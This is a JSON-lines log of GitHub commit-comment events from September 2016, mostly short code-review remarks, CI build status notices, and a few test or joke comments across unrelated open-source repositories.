{"id":"4582746980","type":"CommitCommentEvent","actor":{"login":"da3dsoul"},"repo":{"name":"japanesemediamanager/jmmserver"},"payload":{"comment":{"id":19077152,"position":5,"line":218,"path":"JMMServer/API/APIv2_core_Module.cs","commit_id":"932eb0cc5d32c103a76241b5a58a259084286c90","created_at":"2016-09-19T11:32:15Z","updated_at":"2016-09-19T11:32:15Z","body":"@bigretromike is simultaneously the word you were looking for?"}},"created_at":"2016-09-19T11:32:15Z"}
{"id":"4582747917","type":"CommitCommentEvent","actor":{"login":"atamon"},"repo":{"name":"Reposoft/repos-upload"},"payload":{"comment":{"id":19077153,"position":null,"line":null,"path":null,"commit_id":"63303ea190a9a754abb72eac8b314515398f3b68","created_at":"2016-09-19T11:32:29Z","updated_at":"2016-09-19T11:32:29Z","body":"Cant we add a dummy file to avoid the need for mkdir?"}},"created_at":"2016-09-19T11:32:29Z"}
{"id":"4582750107","type":"CommitCommentEvent","actor":{"login":"da3dsoul"},"repo":{"name":"japanesemediamanager/jmmserver"},"payload":{"comment":{"id":19077158,"position":14,"line":70,"path":"JMMServer/API/Model/APIMessage.cs","commit_id":"932eb0cc5d32c103a76241b5a58a259084286c90","created_at":"2016-09-19T11:33:03Z","updated_at":"2016-09-19T11:33:03Z","body":"Let's use default overrides when possible for clean code."}},"created_at":"2016-09-19T11:33:03Z"}
{"id":"4582753206","type":"CommitCommentEvent","actor":{"login":"AdmiralUshakov"},"repo":{"name":"AdmiralUshakov/new"},"payload":{"comment":{"id":19077167,"position":null,"line":null,"path":null,"commit_id":"54944787209f9a63c7f6363d7d8ac0a9a58008d6","created_at":"2016-09-19T11:33:49Z","updated_at":"2016-09-19T11:33:49Z","body":"доработал"}},"created_at":"2016-09-19T11:33:49Z"}
{"id":"4582758461","type":"CommitCommentEvent","actor":{"login":"tonyandrewmeyer"},"repo":{"name":"SpamExperts/trac-slack"},"payload":{"comment":{"id":19077177,"position":4,"line":410,"path":"natural.py","commit_id":"ec2a5380fec4c182251ca816a40f54af6956ad1d","created_at":"2016-09-19T11:35:07Z","updated_at":"2016-09-19T11:35:07Z","body":"😆 "}},"created_at":"2016-09-19T11:35:07Z"}
{"id":"4582759061","type":"CommitCommentEvent","actor":{"login":"lgs3137"},"repo":{"name":"gfwlist/gfwlist"},"payload":{"comment":{"id":19077181,"position":null,"line":null,"path":null,"commit_id":"46eb8088978027f8cd4790499013249c7c57cef8","created_at":"2016-09-19T11:35:15Z","updated_at":"2016-09-19T11:35:15Z","body":"😄"}},"created_at":"2016-09-19T11:35:15Z"}
{"id":"4582759127","type":"CommitCommentEvent","actor":{"login":"jfkthame"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19077183,"position":null,"line":null,"path":null,"commit_id":"6a0c28b768998d2cf443699f4f9310b32bdb407e","created_at":"2016-09-19T11:35:16Z","updated_at":"2016-09-19T11:35:16Z","body":"When that means they satisfy the requested properties equally well, the last one specified wins."}},"created_at":"2016-09-19T11:35:16Z"}
{"id":"4582762973","type":"CommitCommentEvent","actor":{"login":"SamSaffron"},"repo":{"name":"discourse/DiscourseMobile"},"payload":{"comment":{"id":19077191,"position":null,"line":null,"path":null,"commit_id":"f87826d23f86403f13ee581437007173fb4e8f94","created_at":"2016-09-19T11:36:13Z","updated_at":"2016-09-19T11:36:13Z","body":"I do like this change a lot! "}},"created_at":"2016-09-19T11:36:13Z"}
{"id":"4582766159","type":"CommitCommentEvent","actor":{"login":"rossi2000"},"repo":{"name":"OpenViX/skins"},"payload":{"comment":{"id":19077204,"position":null,"line":null,"path":null,"commit_id":"369a1f29e86f9ca6fa49db652dd056a1f6079891","created_at":"2016-09-19T11:37:01Z","updated_at":"2016-09-19T11:37:01Z","body":"shite."}},"created_at":"2016-09-19T11:37:01Z"}
{"id":"4582766161","type":"CommitCommentEvent","actor":{"login":"kiwinet"},"repo":{"name":"kiwinet/site-ksia"},"payload":{"comment":{"id":19077203,"position":null,"line":null,"path":null,"commit_id":"8e2c6ca496be6d0164c9cc9d475661be525648eb","created_at":"2016-09-19T11:37:01Z","updated_at":"2016-09-19T11:37:01Z","body":"s"}},"created_at":"2016-09-19T11:37:01Z"}
{"id":"4582770271","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":19077207,"position":null,"line":null,"path":null,"commit_id":"2e0a9c480f987003e9750a032e25d6eaf370e087","created_at":"2016-09-19T11:37:56Z","updated_at":"2016-09-19T11:37:56Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#Pqn3eFUCRIqDwfXrJXDbVQ"}},"created_at":"2016-09-19T11:37:56Z"}
{"id":"4582770857","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19077209,"position":null,"line":null,"path":null,"commit_id":"239038316a3bd599fdcfa1f1ded9200934bbc471","created_at":"2016-09-19T11:38:06Z","updated_at":"2016-09-19T11:38:06Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1045](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13523&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-19T11:38:06Z"}
{"id":"4582776203","type":"CommitCommentEvent","actor":{"login":"swankjesse"},"repo":{"name":"square/okhttp"},"payload":{"comment":{"id":19077217,"position":35,"line":100,"path":"okhttp-urlconnection/src/main/java/okhttp3/JavaNetCookieJar.java","commit_id":"ed43e07ffb3bb95708fe9840cf9fc2f523b2f1e5","created_at":"2016-09-19T11:39:24Z","updated_at":"2016-09-19T11:39:24Z","body":"It's intended to bring compatibility with the spec and with browsers."}},"created_at":"2016-09-19T11:39:24Z"}
{"id":"4582777136","type":"CommitCommentEvent","actor":{"login":"lmoresi"},"repo":{"name":"underworldcode/underworld2"},"payload":{"comment":{"id":19077220,"position":null,"line":null,"path":null,"commit_id":"f44381ee5c6dea7f31ee5f5f2d8b0ff5d5630f10","created_at":"2016-09-19T11:39:41Z","updated_at":"2016-09-19T11:39:41Z","body":"Confíteor Deo omnipoténti\r\net vobis, fratres,\r\nquia peccávi nimis\r\ncogitatióne, verbo,\r\nópere et omissióne:\r\nmea culpa, mea culpa,\r\nmea máxima culpa.\r\nIdeo precor beátam Maríam semper vírginem,\r\nomnes angelos et sanctos,\r\net vos, fratres,\r\noráre pro me ad Dóminum Deum nostrum."}},"created_at":"2016-09-19T11:39:41Z"}
{"id":"4582779911","type":"CommitCommentEvent","actor":{"login":"testcc1"},"repo":{"name":"testcc1/Github_repo"},"payload":{"comment":{"id":19077227,"position":null,"line":null,"path":null,"commit_id":"62359ef519d9fd94f80ce054dba9d9cccdad66dd","created_at":"2016-09-19T11:40:22Z","updated_at":"2016-09-19T11:40:22Z","body":"Collaborator:\nCorresponding review in collaborator has been deleted."}},"created_at":"2016-09-19T11:40:22Z"}
{"id":"4582780224","type":"CommitCommentEvent","actor":{"login":"KairusDarkSeeker"},"repo":{"name":"KairusDarkSeeker/PrivateVaults"},"payload":{"comment":{"id":19077229,"position":null,"line":null,"path":null,"commit_id":"0bd8aeec9de722503498f3ea76e920b201df31e7","created_at":"2016-09-19T11:40:27Z","updated_at":"2016-09-19T11:40:27Z","body":"@CoolGuyMC ?"}},"created_at":"2016-09-19T11:40:27Z"}
{"id":"4582780860","type":"CommitCommentEvent","actor":{"login":"tonyandrewmeyer"},"repo":{"name":"SpamExperts/trac-slack"},"payload":{"comment":{"id":19077230,"position":null,"line":null,"path":null,"commit_id":"d78fc8a3ef7ed22f06a0de85311dd42b591172af","created_at":"2016-09-19T11:40:37Z","updated_at":"2016-09-19T11:40:37Z","body":"I guess this will actually cause problems for a link like `https://example.com?foo=bar&baz=1` because the & will get escaped inside of the marked up link.\r\n\r\nProbably the escaping needs to move into the conversion. But this is likely better given that links are common and links with the problematic characters are less common. So can fix that later."}},"created_at":"2016-09-19T11:40:37Z"}
{"id":"4582782756","type":"CommitCommentEvent","actor":{"login":"peyman0930"},"repo":{"name":"peyman0930/anti_spam"},"payload":{"comment":{"id":19077241,"position":null,"line":null,"path":null,"commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-19T11:41:07Z","updated_at":"2016-09-19T11:41:07Z","body":"172718"}},"created_at":"2016-09-19T11:41:07Z"}
{"id":"4582783904","type":"CommitCommentEvent","actor":{"login":"peyman0930"},"repo":{"name":"peyman0930/anti_spam"},"payload":{"comment":{"id":19077245,"position":null,"line":null,"path":null,"commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-19T11:41:24Z","updated_at":"2016-09-19T11:41:24Z","body":"AjUU"}},"created_at":"2016-09-19T11:41:24Z"}
{"id":"4582784262","type":"CommitCommentEvent","actor":{"login":"peyman0930"},"repo":{"name":"peyman0930/anti_spam"},"payload":{"comment":{"id":19077246,"position":null,"line":null,"path":null,"commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-19T11:41:29Z","updated_at":"2016-09-19T11:41:29Z","body":"HH"}},"created_at":"2016-09-19T11:41:29Z"}
{"id":"4582784543","type":"CommitCommentEvent","actor":{"login":"peyman0930"},"repo":{"name":"peyman0930/anti_spam"},"payload":{"comment":{"id":19077247,"position":null,"line":null,"path":null,"commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-19T11:41:33Z","updated_at":"2016-09-19T11:41:33Z","body":" Bh"}},"created_at":"2016-09-19T11:41:33Z"}
{"id":"4582784839","type":"CommitCommentEvent","actor":{"login":"peyman0930"},"repo":{"name":"peyman0930/anti_spam"},"payload":{"comment":{"id":19077248,"position":null,"line":null,"path":null,"commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-19T11:41:38Z","updated_at":"2016-09-19T11:41:38Z","body":"BbHa"}},"created_at":"2016-09-19T11:41:38Z"}
{"id":"4582785064","type":"CommitCommentEvent","actor":{"login":"peyman0930"},"repo":{"name":"peyman0930/anti_spam"},"payload":{"comment":{"id":19077250,"position":null,"line":null,"path":null,"commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-19T11:41:41Z","updated_at":"2016-09-19T11:41:41Z","body":"Bgaha"}},"created_at":"2016-09-19T11:41:41Z"}
{"id":"4582785567","type":"CommitCommentEvent","actor":{"login":"peyman0930"},"repo":{"name":"peyman0930/anti_spam"},"payload":{"comment":{"id":19077252,"position":null,"line":null,"path":null,"commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-19T11:41:49Z","updated_at":"2016-09-19T11:41:49Z","body":"H"}},"created_at":"2016-09-19T11:41:49Z"}
{"id":"4582785703","type":"CommitCommentEvent","actor":{"login":"peyman0930"},"repo":{"name":"peyman0930/anti_spam"},"payload":{"comment":{"id":19077253,"position":null,"line":null,"path":null,"commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-19T11:41:52Z","updated_at":"2016-09-19T11:41:52Z","body":"A"}},"created_at":"2016-09-19T11:41:52Z"}
{"id":"4582786012","type":"CommitCommentEvent","actor":{"login":"peyman0930"},"repo":{"name":"peyman0930/anti_spam"},"payload":{"comment":{"id":19077254,"position":null,"line":null,"path":null,"commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-19T11:41:56Z","updated_at":"2016-09-19T11:41:56Z","body":"J"}},"created_at":"2016-09-19T11:41:56Z"}
{"id":"4582786224","type":"CommitCommentEvent","actor":{"login":"peyman0930"},"repo":{"name":"peyman0930/anti_spam"},"payload":{"comment":{"id":19077256,"position":null,"line":null,"path":null,"commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-19T11:41:59Z","updated_at":"2016-09-19T11:41:59Z","body":"S"}},"created_at":"2016-09-19T11:41:59Z"}
{"id":"4582788211","type":"CommitCommentEvent","actor":{"login":"peyman0930"},"repo":{"name":"peyman0930/anti_spam"},"payload":{"comment":{"id":19077260,"position":null,"line":null,"path":null,"commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-19T11:42:28Z","updated_at":"2016-09-19T11:42:28Z","body":"id!"}},"created_at":"2016-09-19T11:42:28Z"}
{"id":"4582789624","type":"CommitCommentEvent","actor":{"login":"simvery"},"repo":{"name":"10alswhd/BlueHouseProject"},"payload":{"comment":{"id":19077263,"position":null,"line":null,"path":null,"commit_id":"8233f33b992d3b6d4b999f6a592176a82bd59044","created_at":"2016-09-19T11:42:48Z","updated_at":"2016-09-19T11:42:48Z","body":"1보다 큰 수여야 하는데 1을 입력했을때 1도 소수라고 나옵니다 "}},"created_at":"2016-09-19T11:42:48Z"}
{"id":"4582790507","type":"CommitCommentEvent","actor":{"login":"stephanemagnenat"},"repo":{"name":"aseba-community/dashel"},"payload":{"comment":{"id":19077269,"position":6,"line":63,"path":"dashel/dashel.h","commit_id":"8e93fe6014a1e2b99d1dc243209c7d77839942dc","created_at":"2016-09-19T11:43:01Z","updated_at":"2016-09-19T11:43:01Z","body":"Why \\n?"}},"created_at":"2016-09-19T11:43:01Z"}
{"id":"4582793125","type":"CommitCommentEvent","actor":{"login":"kumaresan-plivo"},"repo":{"name":"rdkrish-plivo/zoom-conference-app"},"payload":{"comment":{"id":19077276,"position":null,"line":null,"path":null,"commit_id":"ed0bf6a9a7ede7071bde58ce50934cb6cda5ccca","created_at":"2016-09-19T11:43:42Z","updated_at":"2016-09-19T11:43:42Z","body":"Few nice to have:\r\n\r\n* Use bootstrap\r\n* Add helper text in your index.html about participant id and other details(like wait you are being connected, you are connected, conference has ended etc. Don't use alerts, use flash messages instead."}},"created_at":"2016-09-19T11:43:42Z"}
{"id":"4582794472","type":"CommitCommentEvent","actor":{"login":"davidjsherman"},"repo":{"name":"aseba-community/dashel"},"payload":{"comment":{"id":19077283,"position":6,"line":63,"path":"dashel/dashel.h","commit_id":"8e93fe6014a1e2b99d1dc243209c7d77839942dc","created_at":"2016-09-19T11:44:04Z","updated_at":"2016-09-19T11:44:04Z","body":"same as previous entries?"}},"created_at":"2016-09-19T11:44:04Z"}
{"id":"4582796703","type":"CommitCommentEvent","actor":{"login":"andrebola"},"repo":{"name":"MTG/freesound"},"payload":{"comment":{"id":19077290,"position":46,"line":46,"path":"utils/downloads.py","commit_id":"de139e17b766b2e5059c0143cb0ede77581589e9","created_at":"2016-09-19T11:44:37Z","updated_at":"2016-09-19T11:44:37Z","body":"I've made this change, also checked that the output is the same. https://github.com/MTG/freesound/commit/0fa36f20c80b2128b88715020136babd15e4055d"}},"created_at":"2016-09-19T11:44:37Z"}
{"id":"4582804248","type":"CommitCommentEvent","actor":{"login":"stephanemagnenat"},"repo":{"name":"aseba-community/dashel"},"payload":{"comment":{"id":19077310,"position":6,"line":63,"path":"dashel/dashel.h","commit_id":"8e93fe6014a1e2b99d1dc243209c7d77839942dc","created_at":"2016-09-19T11:46:26Z","updated_at":"2016-09-19T11:46:26Z","body":"yes, I just realized github displays \"\\n\" for empty lines, hence I deleted my comment ;-)"}},"created_at":"2016-09-19T11:46:26Z"}
{"id":"4582807684","type":"CommitCommentEvent","actor":{"login":"smls"},"repo":{"name":"perl6/roast"},"payload":{"comment":{"id":19077322,"position":null,"line":null,"path":null,"commit_id":"581b553b74873941f9629d7202adf4a79f843fc4","created_at":"2016-09-19T11:47:15Z","updated_at":"2016-09-19T11:47:15Z","body":"The second test may be testing idiosyncratic Rakudo behavior rather than intended/ideal behavior - see my comment at https://rt.perl.org/Ticket/Display.html?id=129299#txn-1423985"}},"created_at":"2016-09-19T11:47:15Z"}
{"id":"4582821812","type":"CommitCommentEvent","actor":{"login":"GavinDmello"},"repo":{"name":"evnix/etzel"},"payload":{"comment":{"id":19077354,"position":null,"line":null,"path":null,"commit_id":"11336703121ae92971074bbe559725e410aa0598","created_at":"2016-09-19T11:50:49Z","updated_at":"2016-09-19T11:50:49Z","body":"Push a new release 👍 "}},"created_at":"2016-09-19T11:50:49Z"}
{"id":"4582823756","type":"CommitCommentEvent","actor":{"login":"jfkthame"},"repo":{"name":"litherum/csswg-drafts"},"payload":{"comment":{"id":19077359,"position":null,"line":null,"path":null,"commit_id":"6a0c28b768998d2cf443699f4f9310b32bdb407e","created_at":"2016-09-19T11:51:16Z","updated_at":"2016-09-19T11:51:16Z","body":"A question, though, is what the syntax for ranges should be.\r\n\r\n    font-weight: 300-800;\r\n\r\nseems straightforward enough; but what about ranges for font-style:oblique, where the actual values could be negative? We could require spaces around the range-separating dash:\r\n\r\n    font-style: oblique -20deg - -10deg;\r\n\r\nbut this seems really ugly and easy to get wrong.\r\n\r\nISTM that using \"..\" to denote ranges would make for a much clearer syntax:\r\n\r\n    font-weight: 300..800;\r\n    font-style: oblique -20deg..-10deg;\r\n\r\nBut I don't know if that conflicts with other usage in CSS (and unfortunately we already have unicode-range using dashes for ranges -- though maybe we could introduce \"..\" as an alternative there, and then discourage the old dash notation, which looks a bit odd in conjunction with the \"U+\" prefix anyway)."}},"created_at":"2016-09-19T11:51:16Z"}
{"id":"4582824642","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19077360,"position":null,"line":null,"path":null,"commit_id":"239038316a3bd599fdcfa1f1ded9200934bbc471","created_at":"2016-09-19T11:51:29Z","updated_at":"2016-09-19T11:51:29Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1045](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13523&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 239, ignored: 3 Build time: 00:13:23"}},"created_at":"2016-09-19T11:51:29Z"}
{"id":"4582829695","type":"CommitCommentEvent","actor":{"login":"ananya-bhattacharya"},"repo":{"name":"ameyk/CASK-PSL"},"payload":{"comment":{"id":19077380,"position":5,"line":18,"path":"hydrator-plugins/spark-plugins/docs/LogisticRegressionClassifier-sparkcompute.md","commit_id":"5895217f0c937d2b4cbb62eaa977a85837c7cd7a","created_at":"2016-09-19T11:52:41Z","updated_at":"2016-09-19T11:52:41Z","body":"Can we change this to : \r\n**featuresToInclude:** A comma-separated sequence of fields to be used for classification. If empty, all fields will be used for classification. Features to be used, must be from one of the following types: int, long, float or double. Both\r\n *featuresToInclude* and *featuresToExclude* fields cannot be specified."}},"created_at":"2016-09-19T11:52:41Z"}
{"id":"4582839479","type":"CommitCommentEvent","actor":{"login":"davidjsherman"},"repo":{"name":"aseba-community/dashel"},"payload":{"comment":{"id":19077408,"position":6,"line":63,"path":"dashel/dashel.h","commit_id":"8e93fe6014a1e2b99d1dc243209c7d77839942dc","created_at":"2016-09-19T11:55:07Z","updated_at":"2016-09-19T11:55:07Z","body":"No, they are really in the file. I think to prevent Doxygen from starting a new paragraph, [\"\\n\" is equivalent to a \"<br>\"](https://www.stack.nl/~dimitri/doxygen/manual/commands.html#cmdn).\r\n"}},"created_at":"2016-09-19T11:55:07Z"}
{"id":"4582839530","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/literate-scientific-software"},"payload":{"comment":{"id":19077409,"position":16,"line":73,"path":"code/Language/Drasil/TeX/Print.hs","commit_id":"01e0fb27af1f8bf0ab3332448f7d575e0992fbc9","created_at":"2016-09-19T11:55:08Z","updated_at":"2016-09-19T11:55:08Z","body":"isNothing (and fromJust) should be avoided like the plague.  Use pattern-matching on the lhs instead."}},"created_at":"2016-09-19T11:55:08Z"}
{"id":"4582839760","type":"CommitCommentEvent","actor":{"login":"dykstranet"},"repo":{"name":"thebitcoincoop/coinos"},"payload":{"comment":{"id":19077412,"position":null,"line":null,"path":null,"commit_id":"90da658fe477005ad8ab140d205b0d0e1dce00ea","created_at":"2016-09-19T11:55:11Z","updated_at":"2016-09-19T11:55:11Z","body":"Good stuff! Now we can send suitable amounts in high denomination currencies!!"}},"created_at":"2016-09-19T11:55:11Z"}
{"id":"4582840132","type":"CommitCommentEvent","actor":{"login":"ananya-bhattacharya"},"repo":{"name":"ameyk/CASK-PSL"},"payload":{"comment":{"id":19077414,"position":8,"line":20,"path":"hydrator-plugins/spark-plugins/docs/LogisticRegressionClassifier-sparkcompute.md","commit_id":"5895217f0c937d2b4cbb62eaa977a85837c7cd7a","created_at":"2016-09-19T11:55:15Z","updated_at":"2016-09-19T11:55:15Z","body":"Can we change this to : \r\n**featuresToExclude:** A comma-separated sequence of fields to be excluded for classification. If empty, all fields will be used for classification. Both *featuresToInclude* and *featuresToExclude* fields cannot be specified."}},"created_at":"2016-09-19T11:55:15Z"}
{"id":"4582842510","type":"CommitCommentEvent","actor":{"login":"ananya-bhattacharya"},"repo":{"name":"ameyk/CASK-PSL"},"payload":{"comment":{"id":19077420,"position":10,"line":22,"path":"hydrator-plugins/spark-plugins/docs/LogisticRegressionClassifier-sparkcompute.md","commit_id":"5895217f0c937d2b4cbb62eaa977a85837c7cd7a","created_at":"2016-09-19T11:55:49Z","updated_at":"2016-09-19T11:55:49Z","body":"Can we change this to : \r\n The field on which to set the prediction."}},"created_at":"2016-09-19T11:55:49Z"}
{"id":"4582842749","type":"CommitCommentEvent","actor":{"login":"sven-7"},"repo":{"name":"ZeroQI/Hama.bundle"},"payload":{"comment":{"id":19077421,"position":null,"line":null,"path":null,"commit_id":"b9565881effd8219c71bdcd6a63ed643484260b0","created_at":"2016-09-19T11:55:51Z","updated_at":"2016-09-19T11:55:51Z","body":"Will this get committed to the master?"}},"created_at":"2016-09-19T11:55:51Z"}
{"id":"4582851576","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/literate-scientific-software"},"payload":{"comment":{"id":19077442,"position":null,"line":null,"path":null,"commit_id":"6525e35afd23f2e81cb23b10eeec1b11ff9875e6","created_at":"2016-09-19T11:58:04Z","updated_at":"2016-09-19T11:58:04Z","body":"There is such an AST that already exists, in the GOOL project.  I'll give you a copy."}},"created_at":"2016-09-19T11:58:04Z"}
{"id":"4582854415","type":"CommitCommentEvent","actor":{"login":"hdavid"},"repo":{"name":"hdavid/Launchpad95"},"payload":{"comment":{"id":19077450,"position":32,"line":1054,"path":"StepSequencerComponent.py","commit_id":"6c48c371f1f0a9236d99db8a0bef06732fdc5ad9","created_at":"2016-09-19T11:58:43Z","updated_at":"2016-09-19T11:58:43Z","body":"please make sure that this function is not called when the stepsequencer is \"off\" this would be quite bad otherwise"}},"created_at":"2016-09-19T11:58:43Z"}
{"id":"4582854738","type":"CommitCommentEvent","actor":{"login":"ananya-bhattacharya"},"repo":{"name":"ameyk/CASK-PSL"},"payload":{"comment":{"id":19077452,"position":12,"line":24,"path":"hydrator-plugins/spark-plugins/docs/LogisticRegressionClassifier-sparkcompute.md","commit_id":"5895217f0c937d2b4cbb62eaa977a85837c7cd7a","created_at":"2016-09-19T11:58:48Z","updated_at":"2016-09-19T11:58:48Z","body":"Since, numFeatures is required for only calculating the hashing, can we mention this in the description.\r\nSince, we already have the config parameters featuresToInclude or featuresToExclude  that is to be used for classification."}},"created_at":"2016-09-19T11:58:48Z"}
{"id":"4582859079","type":"CommitCommentEvent","actor":{"login":"piecioshka"},"repo":{"name":"PawlakArtur/CurriculumVitae"},"payload":{"comment":{"id":19077463,"position":null,"line":null,"path":null,"commit_id":"cf6f2bd6ee0084fe0ab0aa06fb5f356f6947d583","created_at":"2016-09-19T11:59:52Z","updated_at":"2016-09-19T11:59:52Z","body":"Ach te efekciki, co my byśmy bez nich zrobili 😃 "}},"created_at":"2016-09-19T11:59:52Z"}
{"id":"4582859305","type":"CommitCommentEvent","actor":{"login":"ananya-bhattacharya"},"repo":{"name":"ameyk/CASK-PSL"},"payload":{"comment":{"id":19077465,"position":19,"line":31,"path":"hydrator-plugins/spark-plugins/docs/LogisticRegressionClassifier-sparkcompute.md","commit_id":"5895217f0c937d2b4cbb62eaa977a85837c7cd7a","created_at":"2016-09-19T11:59:55Z","updated_at":"2016-09-19T11:59:55Z","body":"We can mention this in the description itself, and hence will not be required to specify conditions explicitly"}},"created_at":"2016-09-19T11:59:55Z"}
{"id":"4582861006","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19077467,"position":null,"line":null,"path":null,"commit_id":"2a6a02c8dc4c95c0f75c90270b15a8bfc17bd9d8","created_at":"2016-09-19T12:00:21Z","updated_at":"2016-09-19T12:00:21Z","body":"TeamCity OTA+ :: rvi_sota_server :: migrations container [Build 58](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13535&buildTypeId=ota_plus_RviSotaServer_MigrationsContainer) is now running\n"}},"created_at":"2016-09-19T12:00:21Z"}
{"id":"4582865592","type":"CommitCommentEvent","actor":{"login":"rylyade1"},"repo":{"name":"SecurityRAT/SecurityRAT"},"payload":{"comment":{"id":19077482,"position":null,"line":null,"path":null,"commit_id":"4a8a4f5d1f2899848b870cb3829113b1d911e9bf","created_at":"2016-09-19T12:01:24Z","updated_at":"2016-09-19T12:01:24Z","body":"fixes issue #14 ."}},"created_at":"2016-09-19T12:01:24Z"}
{"id":"4582867025","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19077489,"position":null,"line":null,"path":null,"commit_id":"2a6a02c8dc4c95c0f75c90270b15a8bfc17bd9d8","created_at":"2016-09-19T12:01:44Z","updated_at":"2016-09-19T12:01:44Z","body":"TeamCity OTA+ :: rvi_sota_server :: migrations container [Build 58](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13535&buildTypeId=ota_plus_RviSotaServer_MigrationsContainer) outcome was **SUCCESS**\nSummary: Running Build time: 00:01:23"}},"created_at":"2016-09-19T12:01:44Z"}
{"id":"4582868973","type":"CommitCommentEvent","actor":{"login":"PascalSchumacher"},"repo":{"name":"apache/commons-lang"},"payload":{"comment":{"id":19077493,"position":null,"line":null,"path":null,"commit_id":"e6ad17215d27b66b7fe43931247fc3470d8dee18","created_at":"2016-09-19T12:02:11Z","updated_at":"2016-09-19T12:02:11Z","body":":+1: "}},"created_at":"2016-09-19T12:02:11Z"}
{"id":"4582870043","type":"CommitCommentEvent","actor":{"login":"simvery"},"repo":{"name":"simvery/BlueHouseProject"},"payload":{"comment":{"id":19077495,"position":null,"line":null,"path":null,"commit_id":"8233f33b992d3b6d4b999f6a592176a82bd59044","created_at":"2016-09-19T12:02:26Z","updated_at":"2016-09-19T12:02:26Z","body":"1이상부터 소수인데 1을 입력했을때 소수라고 뜹니다!"}},"created_at":"2016-09-19T12:02:26Z"}
{"id":"4582871711","type":"CommitCommentEvent","actor":{"login":"zoffixznet"},"repo":{"name":"perl6/roast"},"payload":{"comment":{"id":19077502,"position":null,"line":null,"path":null,"commit_id":"581b553b74873941f9629d7202adf4a79f843fc4","created_at":"2016-09-19T12:02:50Z","updated_at":"2016-09-19T12:02:50Z","body":"[IMO it should be an `Any`](http://irclog.perlgeek.de/perl6-dev/2016-09-19#i_13236011) rather than `Mu` and that was the returned value in 2016.07 and prior.\r\n\r\n[I asked lizmat about it](http://irclog.perlgeek.de/perl6-dev/2016-09-19#i_13235265)"}},"created_at":"2016-09-19T12:02:50Z"}
{"id":"4582875634","type":"CommitCommentEvent","actor":{"login":"fightingyuge"},"repo":{"name":"fightingyuge/effective-acm"},"payload":{"comment":{"id":19077515,"position":1,"line":1,"path":"Trie-tree/README.ME","commit_id":"4ae236aed287ef032da82f3646a02be8786f7fb7","created_at":"2016-09-19T12:03:49Z","updated_at":"2016-09-19T12:03:49Z","body":"#一种树形结构,是一种哈希树的变种。典型应用是用于统计,排序和保存大量的字符串(但不仅限于字符串)"}},"created_at":"2016-09-19T12:03:49Z"}
{"id":"4582875832","type":"CommitCommentEvent","actor":{"login":"wmoldwin"},"repo":{"name":"oe-alliance/AutoBouquetsMaker"},"payload":{"comment":{"id":19077516,"position":null,"line":null,"path":null,"commit_id":"86fbb03d4a73525b615a09408148d45a50b3fa31","created_at":"2016-09-19T12:03:52Z","updated_at":"2016-09-19T12:03:52Z","body":"In that case, I think it would be best to include the orbital position or satellite name in the bouquet name, e.g.: \"Bis TV (13°E)\" or \"Bis TV (Hot Bird)\"."}},"created_at":"2016-09-19T12:03:52Z"}
{"id":"4582876215","type":"CommitCommentEvent","actor":{"login":"Ap110460"},"repo":{"name":"google/search-samples"},"payload":{"comment":{"id":19077518,"position":null,"line":null,"path":null,"commit_id":"57d78f1d2a5d6c52b69196b3aae551e98b925950","created_at":"2016-09-19T12:03:58Z","updated_at":"2016-09-19T12:03:58Z","body":"Project"}},"created_at":"2016-09-19T12:03:58Z"}
{"id":"4582876935","type":"CommitCommentEvent","actor":{"login":"Bammerbom"},"repo":{"name":"SpongePowered/SpongeAPI"},"payload":{"comment":{"id":19077520,"position":32,"line":55,"path":"src/main/java/org/spongepowered/api/item/inventory/entity/PlayerInventory.java","commit_id":"b88f5eba36f8f62892b10f17ea094d5bcb884ea1","created_at":"2016-09-19T12:04:11Z","updated_at":"2016-09-19T12:04:11Z","body":"incorrect return"}},"created_at":"2016-09-19T12:04:11Z"}
